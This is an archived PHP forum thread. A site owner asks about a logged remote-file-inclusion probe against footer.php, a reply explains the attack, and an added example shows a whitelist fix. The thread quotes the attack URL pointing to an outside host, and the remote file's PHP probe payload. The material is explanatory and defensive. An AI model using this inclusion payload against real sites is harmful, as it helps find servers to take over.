
Can this be hacked?


crawlerbasher


I was checking my log and noticed this URL being entered.

 

mooglebook//footer.php?footer_file=http://networks.kpru.ac.th/list/respon1.txt?

 

This is the footer that it tried to access.

 

</td>
      </tr>
    </table></td>
  </tr>
</table>
<p align="center"><strong>Crawlerbasher.NET © 2005 - 2009<br />
(c) 2001-2003 SQUARE   ENIX CO., LTD. All Rights Reserved. Title Design by Yoshitaka Amano.<br />
FINAL   FANTASY, TETRA MASTER and VANA'DIEL are registered trademarks of Square Enix   Co., Ltd. SQUARE ENIX, PLAYONLINE and the PlayOnline logo are trademarks of   Square Enix Co., Ltd.</strong></p>
</body>
</html>

 

Now can they actually try to hack the site with the HTML code that is in the footer of the PHP script?

 

Link to comment
https://forums.phpfreaks.com/topic/196083-can-this-be-hacked/

I think you missed the point of what that URL means. It has nothing to do with what code or HTML your footer is; it concerns getting your site to include and execute the code from the URL that was passed as a parameter to your code.

 

If your code is using an include/require statement and allow_url_fopen and/or allow_url_include is on (depending on PHP version), then the raw PHP code in the ..../list/respon1.txt will get executed on your server. That code is -

 

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

 

which would output the feelcomz string back to the bot script to signify that a site was found that could be taken over.

Link to comment
https://forums.phpfreaks.com/topic/196083-can-this-be-hacked/#findComment-1029843

Well, my hosting has a lot of protection against this sort of thing.

 

And this just pops up with a 404 error.

 

Is there any way to protect my site from this, and also even though it seemed to have failed, should I still report this to my hosting provider?

 

Link to comment
https://forums.phpfreaks.com/topic/196083-can-this-be-hacked/#findComment-1029844
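
One way to close the inclusion path described in the reply above, and to answer the question about protecting the site, as an added example that is not code from the thread: footer.php selects the footer from a fixed map instead of including the request value. Only `footer_file` comes from the logged URL; the directory, the file names and the `resolve_footer` helper are assumptions.

```php
<?php
// Added example, not code from the thread. footer_file is the parameter seen in
// the logged URL; the directory and file names below are assumptions.

// Pattern the probe is looking for: request input handed straight to include.
//     include $_GET['footer_file'];   // with allow_url_include on, a URL is fetched and run
// Independently of the code below, keep allow_url_include = Off in php.ini.

const FOOTER_DIR = __DIR__ . '/includes';   // assumed layout
const FOOTERS = [                           // assumed file names
    'default' => 'footer_default.php',
    'forum'   => 'footer_forum.php',
];

/** Map a request value to a fixed local path; anything not in the map gets the default. */
function resolve_footer($requested): string
{
    // Arrays (footer_file[]=x), URLs and unknown names all fail this check.
    $ok = is_string($requested) && array_key_exists($requested, FOOTERS);
    if (!$ok && $requested !== null) {
        // json_encode escapes control characters, so the value cannot forge log lines.
        $shown = json_encode($requested, JSON_UNESCAPED_SLASHES);
        error_log('footer_file rejected: ' . substr((string) $shown, 0, 200));
    }
    // The request value never becomes part of the path, only a key into the map.
    return FOOTER_DIR . '/' . FOOTERS[$ok ? $requested : 'default'];
}

// In footer.php the include would then be:
//     require resolve_footer($_GET['footer_file'] ?? null);

// Constructed inputs, including the value from the logged request.
$samples = [
    'forum',
    'http://networks.kpru.ac.th/list/respon1.txt?',
    'unknown_name',
    ['array', 'value'],
    null,
];
foreach ($samples as $s) {
    printf("%-50s => %s\n", json_encode($s, JSON_UNESCAPED_SLASHES), resolve_footer($s));
}
```

Every input except `forum` resolves to the default footer, and each rejected value is written to the PHP error log, where repeated probes can be spotted.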

Archived

This topic is now archived and is closed to further replies.
